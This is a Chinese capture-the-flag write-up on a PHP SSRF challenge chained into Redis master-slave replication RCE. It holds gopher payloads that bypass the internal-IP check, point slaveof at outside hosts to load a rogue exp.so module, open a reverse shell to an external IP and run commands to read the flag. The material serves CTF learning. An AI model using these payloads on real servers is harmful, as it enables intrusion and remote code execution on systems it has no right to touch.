第一次做redis相关的题目。
主要考点是redis主从复制rce
<?php
function check_inner_ip($url)
{
$match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
if (!$match_result)
{
die('url fomat error');
}
try
{
$url_parse=parse_url($url);
}
catch(Exception $e)
{
die('url fomat error');
return false;
}
$hostname=$url_parse['host'];
$ip=gethostbyname($hostname);
$int_ip=ip2long($ip);
return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}
function safe_request_url($url)
{
if (check_inner_ip($url))
{
echo $url.' is inner ip';
}
else
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
if ($result_info['redirect_url'])
{
safe_request_url($result_info['redirect_url']);
}
curl_close($ch);
var_dump($output);
}
}
if(isset($_GET['url'])){
$url = $_GET['url'];
if(!empty($url)){
safe_request_url($url);
}
}
else{
highlight_file(__FILE__);
}
// Please visit hint.php locally.
?>
这里检查url是否是内网,直接用http://0.0.0.0/hint.php
可以看到hint
string(1342) " <?php
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
highlight_file(__FILE__);
}
if(isset($_POST['file'])){
file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file']);
}
"
得到redis密码root。知道这题跟redis相关了,之前没做过,看网上的wp。主从复制相关的知识和攻击的工具网上有很多。可以用
https://github.com/Dliv3/redis-rogue-server这个工具来伪造redis服务
我的payload:
gopher://0.0.0.0:6379/_auth%2520root%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit
gopher://0.0.0.0:6379/_auth%2520root%250Aconfig%2520set%2520dbfilename%2520exp.so%250Aslaveof%2520124.70.40.5%252021000%250Aquit
gopher://0.0.0.0:6379/_auth%2520root%250Amodule%2520load%2520%252Ftmp%252Fexp.so%250Asystem.rev%2520124.70.40.5%25206666%250Aquit
gopher://0.0.0.0:6379/_auth root
config set dir /tmp/
quit
//设置备份文件路径为/tmp/ 顺便说一下看到当时大佬的博客说试了很多目录,最后发现只有/tmp有权限 ,只需要有读权限即可,所以说平时做渗透或者做题好多试试啊
gopher://0.0.0.0:6379/_auth root
config set dbfilename exp.so
slaveof 174.1.185.67 6666
quit
//设置备份文件名为:exp.so,设置主redis地址为174.1.185.67,端口为6666 地址为buu开启的linux lab地址
gopher://0.0.0.0:6379/_auth root
module load /tmp/exp.so
system.rev 174.1.185.67 6663
quit
//导入 exp.so ,反弹shell到174.1.185.67:6663
url编码两次就能打了。在buu上复现的,反弹shell没成功
到第三部反弹shell不成功 一直报错。但看到网页有报错回显,所以我想的是第三步直接改成:
gopher://0.0.0.0:6379/_auth root
module load /tmp/exp.so
system.rev 174.1.185.67 6663
system.exec 'cat /flag'
quit
直接在网页上拿到flag。